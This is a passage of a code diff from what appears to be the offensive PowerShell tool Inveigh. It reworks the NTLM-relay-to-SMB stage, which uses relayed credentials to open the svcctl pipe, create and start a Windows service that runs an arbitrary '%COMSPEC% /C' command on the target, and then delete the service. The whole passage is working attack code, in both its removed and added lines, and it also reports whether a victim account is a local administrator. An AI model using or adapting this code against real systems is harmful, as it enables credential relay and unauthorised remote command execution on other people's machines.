- [Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_referent_ID_bytes = [String](1..4 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMBRelayCommand = "%COMSPEC% /C `"" + $SMBRelayCommand + "`""
- [System.Text.Encoding]::UTF8.GetBytes($SMBRelayCommand) | ForEach-Object{$SMB_relay_command += "{0:X2}-00-" -f $_}
-
- if([Bool]($SMBRelayCommand.Length % 2))
+ $SMB_relay_response_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_relay_response_stream.Flush()
+ $SMB_relay_response_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if(($SMB_version -eq 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[9..12]) -eq '00-00-00-00') -or ($SMB_version -ne 'SMB1' -and [System.BitConverter]::ToString($SMB_client_receive[12..15]) -eq '00-00-00-00'))
{
- $SMB_relay_command += '00-00'
+ $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication successful for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")])
}
else
{
- $SMB_relay_command += '00-00-00-00'
- }
-
- [Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237)
- $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
- $SMB_service_byte_count_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 174)
- $SMB_service_byte_count_bytes = $SMB_service_byte_count_bytes[0..1]
- $SMB_relay_command_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length / 2)
- $k = 0
-
- :SMB_relay_execute_loop while ($k -lt 12)
+ $inveigh.console_queue.Add("$HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay authentication failed for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string on $Target")])
+ $inveigh.SMBRelay_failed_list.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
+ $SMB_relay_failed = $true
+ $SMB_relay_socket.Close()
+ }
+
+ if(!$SMB_relay_failed)
{
- switch ($k)
+ if(!$Service)
{
-
- 0
- {
- $SMB_relay_execute_send = 0x00,0x00,0x00,0x45,0xff,0x53,0x4d,0x42,0x75,0x00,0x00,0x00,0x00,
- 0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0xff,0xff +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x00,0x00,0x04,0xff,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x1a,0x00,
- 0x00,0x5c,0x5c,0x31,0x30,0x2e,0x31,0x30,0x2e,0x32,0x2e,0x31,0x30,
- 0x32,0x5c,0x49,0x50,0x43,0x24,0x00,0x3f,0x3f,0x3f,0x3f,0x3f,0x00
- }
-
- 1
- {
- $SMB_relay_execute_send = 0x00,0x00,0x00,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x00,0x00,0x00,0x00,
- 0x18,0x02,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x03,0x00,0x18,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x16,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x01,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x08,
- 0x00,0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00
- }
-
- 2
+ $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+ $SMB_service = $SMB_service_random -replace "-00",""
+ $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+ $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+ $SMB_service_random += '00-00-00-00-00'
+ $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ }
+ else
+ {
+ $SMB_service = $Service
+ $SMB_service_bytes = [System.Text.Encoding]::Unicode.GetBytes($Service)
+
+ if([Bool]($SMB_service.Length % 2))
{
- $SMB_relay_execute_send = 0x00,0x00,0x00,0x87,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
- 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x04,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
- 0xff,0xff,0xff,0xff,0x08,0x00,0x48,0x00,0x00,0x00,0x48,0x00,0x3f,
- 0x00,0x00,0x00,0x00,0x00,0x48,0x00,0x05,0x00,0x0b,0x03,0x10,0x00,
- 0x00,0x00,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xd0,0x16,0xd0,
- 0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00,
- 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,
- 0x00,0x10,0x03,0x02,0x00,0x00,0x00,0x04,0x5d,0x88,0x8a,0xeb,0x1c,
- 0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60,0x02,0x00,0x00,
- 0x00
-
- $SMB_multiplex_id = 0x05
- }
-
- 3
- {
- $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
+ $SMB_service_bytes += 0x00,0x00
}
-
- 4
+ else
{
- $SMB_relay_execute_send = 0x00,0x00,0x00,0x9b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
- 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x06,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0xea,0x03,0x00,0x00,
- 0xff,0xff,0xff,0xff,0x08,0x00,0x50,0x00,0x00,0x00,0x5c,0x00,0x3f,
- 0x00,0x00,0x00,0x00,0x00,0x5c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
- 0x00,0x00,0x5c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x38,0x00,0x00,
- 0x00,0x00,0x00,0x0f,0x00,0x00,0x00,0x03,0x00,0x15,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
- $SMB_service_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x3f,0x00,0x0f,0x00
-
- $SMB_multiplex_id = 0x07
- }
-
- 5
- {
- $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
- }
+ $SMB_service_bytes += 0x00,0x00,0x00,0x00
- 6
- {
- $SMB_relay_execute_send = [Array]0x00 +
- $SMB_service_data_length_bytes +
- 0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,0x18,0x05,0x28,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x08,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
- 0xff,0xff,0xff,0xff,0x08,0x00 +
- $SMB_service_byte_count_bytes +
- 0x00,0x00 +
- $SMB_service_byte_count_bytes +
- 0x3f,0x00,0x00,0x00,0x00,0x00 +
- $SMB_service_byte_count_bytes +
- 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00 +
- $SMB_service_byte_count_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0c,
- 0x00 +
- $SMB_context_handler +
- 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
- $SMB_service_bytes +
- 0x00,0x00 +
- $SMB_referent_ID_bytes +
- 0x15,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x15,0x00,0x00,0x00 +
- $SMB_service_bytes +
- 0x00,0x00,0xff,0x01,0x0f,0x00,0x10,0x01,0x00,0x00,0x03,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00 +
- $SMB_relay_command_length_bytes +
- 0x00,0x00,0x00,0x00 +
- $SMB_relay_command_length_bytes +
- $SMB_relay_command_bytes +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00
-
- $SMB_multiplex_id = 0x09
}
- 7
- {
- $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
- }
+ }
-
- 8
- {
- $SMB_relay_execute_send = 0x00,0x00,0x00,0x73,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
- 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x0a,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,
- 0xff,0xff,0xff,0xff,0x08,0x00,0x34,0x00,0x00,0x00,0x34,0x00,0x3f,
- 0x00,0x00,0x00,0x00,0x00,0x34,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
- 0x00,0x00,0x34,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x1c,0x00,0x00,
- 0x00,0x00,0x00,0x13,0x00 +
- $SMB_context_handler +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- }
-
- 9
- {
- $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
- }
-
- 10
- {
- $SMB_relay_execute_send = 0x00,0x00,0x00,0x6b,0xff,0x53,0x4d,0x42,0x2f,0x00,0x00,0x00,0x00,
- 0x18,0x05,0x28,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
- 0x00,0x00,0x00,0x08 +
- $inveigh.process_ID_bytes +
- $SMB_user_ID +
- 0x0b,0x00,0x0e,0xff,0x00,0x00,0x00,0x00,0x40,0x0b,0x01,0x00,0x00,
- 0xff,0xff,0xff,0xff,0x08,0x00,0x2c,0x00,0x00,0x00,0x2c,0x00,0x3f,
- 0x00,0x00,0x00,0x00,0x00,0x2c,0x00,0x05,0x00,0x00,0x03,0x10,0x00,
- 0x00,0x00,0x2c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0x00,
- 0x00,0x00,0x00,0x02,0x00 +
- $SMB_context_handler
- }
+ $SMB_service_length = [System.BitConverter]::GetBytes($SMB_service.length + 1)
+ $Command = "%COMSPEC% /C `"" + $Command + "`""
+ [System.Text.Encoding]::UTF8.GetBytes($Command) | ForEach-Object{$PsExec_command += "{0:X2}-00-" -f $_}
- 11
- {
- $SMB_relay_execute_send = $SMB_relay_execute_ReadAndRequest
- }
+ if([Bool]($Command.Length % 2))
+ {
+ $PsExec_command += '00-00'
+ }
+ else
+ {
+ $PsExec_command += '00-00-00-00'
+ }
+
+ $PsExec_command_bytes = $PsExec_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $PsExec_command_length_bytes = [System.BitConverter]::GetBytes($PsExec_command_bytes.Length / 2)
+ $SMB_path = "\\" + $Target + "\IPC$"
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::UTF8.GetBytes($SMB_path) + 0x00
+ }
+ else
+ {
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_path)
}
+
+ $SMB_named_pipe_UUID = 0x81,0xbb,0x7a,0x36,0x44,0x98,0xf1,0x35,0xad,0x32,0x98,0xf0,0x38,0x00,0x10,0x03
+ $SMB_client_stream = $SMB_relay_socket.GetStream()
+
+ if($SMB_version -eq 'SMB1')
+ {
+ $SMB_client_stage = 'TreeConnectAndXRequest'
+
+ :SMB_execute_loop while ($SMB_client_stage -ne 'Exit')
+ {
- $SMB_relay_execute_stream.Write($SMB_relay_execute_send,0,$SMB_relay_execute_send.Length)
- $SMB_relay_execute_stream.Flush()
+ switch ($SMB_client_stage)
+ {
- if($SMBRelayNetworkTimeout)
- {
- $SMB_relay_execute_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout
- $SMB_relay_execute_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ 'TreeConnectAndXRequest'
+ {
+ $packet_SMB_header = Get-PacketSMBHeader 0x75 0x18 0x01,0x48 0xff,0xff $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBTreeConnectAndXRequest $SMB_path_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'CreateAndXRequest'
+ }
+
+ 'CreateAndXRequest'
+ {
+ $SMB_named_pipe_bytes = 0x5c,0x73,0x76,0x63,0x63,0x74,0x6c,0x00 # \svcctl
+ $SMB_tree_ID = $SMB_client_receive[28,29]
+ $packet_SMB_header = Get-PacketSMBHeader 0xa2 0x18 0x02,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBNTCreateAndXRequest $SMB_named_pipe_bytes
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'RPCBind'
+ }
- while(!$SMB_relay_execute_stream.DataAvailable)
- {
+ 'RPCBind'
+ {
+ $SMB_FID = $SMB_client_receive[42,43]
+ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_RPC_data = Get-PacketRPCBind 1 0xb8,0x10 0x01 0x00,0x00 $SMB_named_pipe_UUID 0x02,0x00
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest
+ $packet_SMB_data["SMBWriteAndXRequest_Remaining"] = 0x48,0x00
+ $packet_SMB_data["SMBWriteAndXRequest_DataLengthLow"] = 0x48,0x00
+ $packet_SMB_data["SMBWriteAndXRequest_ByteCount"] = 0x48,0x00
+ $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'OpenSCManagerW'
+ }
+
+ 'ReadAndXRequest'
+ {
+ Start-Sleep -m 150
+ $packet_SMB_header = Get-PacketSMBHeader 0x2e 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBReadAndXRequest
+ $packet_SMB_data["SMBReadAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $SMB_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = $SMB_client_stage_next
+ }
+
+ 'OpenSCManagerW'
+ {
+ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = Get-PacketSCMOpenSCManagerW $SMB_service_bytes $SMB_service_length
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x01,0x00,0x00,0x00 0x00,0x00 0x0f,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length
+ $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CreateServiceW'
+ }
+
+ 'CreateServiceW'
+ {
- if($SMB_relay_execute_stopwatch.Elapsed -ge $SMB_relay_execute_timeout)
- {
- $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
- $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
- $SMB_relay_failed = $true
- break SMB_relay_execute_loop
- }
+ if([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '00-00-00-00' -and [System.BitConverter]::ToString($SMB_client_receive[88..107]) -ne '00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00')
+ {
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is a local administrator on $Target")])
+ $SMB_service_manager_context_handle = $SMB_client_receive[88..107]
+ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = Get-PacketSCMCreateServiceW $SMB_service_manager_context_handle $SMB_service_bytes $SMB_service_length $PsExec_command_bytes $PsExec_command_length_bytes
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x02,0x00,0x00,0x00 0x00,0x00 0x0c,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length
+ $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'StartServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00')
+ {
+ $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")])
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
+
+ 'StartServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '00-00-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service created on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service created on $Target")])
+ $SMB_service_context_handle = $SMB_client_receive[92..111]
+ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = Get-PacketSCMStartServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x03,0x00,0x00,0x00 0x00,0x00 0x13,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length
+ $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $inveigh.console_queue.Add("Trying to execute SMB relay command on $Target") > $null
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("Trying to execute SMB relay command on $Target")]) > $null
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'DeleteServiceW'
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[112..115]) -eq '31-04-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service creation failed on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service creation failed on $Target")])
+ $SMB_relay_failed = $true
+ }
+ else
+ {
+ $SMB_relay_failed = $true
+ }
+
+ }
- }
+ 'DeleteServiceW'
+ {
+
+ if([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '1d-04-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay command executed on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay command executed on $Target")])
+ }
+ elseif([System.BitConverter]::ToString($SMB_client_receive[88..91]) -eq '02-00-00-00')
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service failed to start on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("SMB relay service $SMB_service failed to start on $Target")])
+ }
+
+ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $packet_SCM_data = Get-PacketSCMDeleteServiceW $SMB_service_context_handle
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x04,0x00,0x00,0x00 0x00,0x00 0x02,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length
+ $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
+ $packet_NetBIOS_session_service = Get-PacketNetBIOSSessionService $SMB_header.Length $RPC_data_length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+ $SMB_client_send = $NetBIOS_session_service + $SMB_header + $SMB_data + $RPC_data + $SCM_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB_client_stage = 'ReadAndXRequest'
+ $SMB_client_stage_next = 'CloseServiceHandle'
+ $SMB_close_service_handle_stage = 1
+ }
+
+ 'CloseServiceHandle'
+ {
+
+ if($SMB_close_service_handle_stage -eq 1)
+ {
+ $inveigh.console_queue.Add("SMB relay service $SMB_service deleted on $Target")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay service $SMB_service deleted on $Target")])
+ $SMB_close_service_handle_stage++
+ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_context_handle
+ }
+ else
+ {
+ $SMB_client_stage = 'CloseRequest'
+ $packet_SCM_data = Get-PacketSCMCloseServiceHandle $SMB_service_manager_context_handle
+ }
+
+ $packet_SMB_header = Get-PacketSMBHeader 0x2f 0x18 0x05,0x28 $SMB_tree_ID $inveigh.process_ID_bytes $SMB_user_ID
+ $SCM_data = ConvertFrom-PacketOrderedDictionary $packet_SCM_data
+ $packet_RPC_data = Get-PacketRPCRequest 0x03 $SCM_data.length 0 0 0x05,0x00,0x00,0x00 0x00,0x00 0x00,0x00
+ $SMB_header = ConvertFrom-PacketOrderedDictionary $packet_SMB_header
+ $packet_SMB_data = Get-PacketSMBWriteAndXRequest $SCM_data.length
+ $packet_SMB_data["SMBWriteAndXRequest_FID"] = $SMB_FID
+ $SMB_data = ConvertFrom-PacketOrderedDictionary $packet_SMB_data
+ $RPC_data = ConvertFrom-PacketOrderedDictionary $packet_RPC_data
+ $RPC_data_length = $SMB_data.Length + $SCM_data.Length + $RPC_data.Length
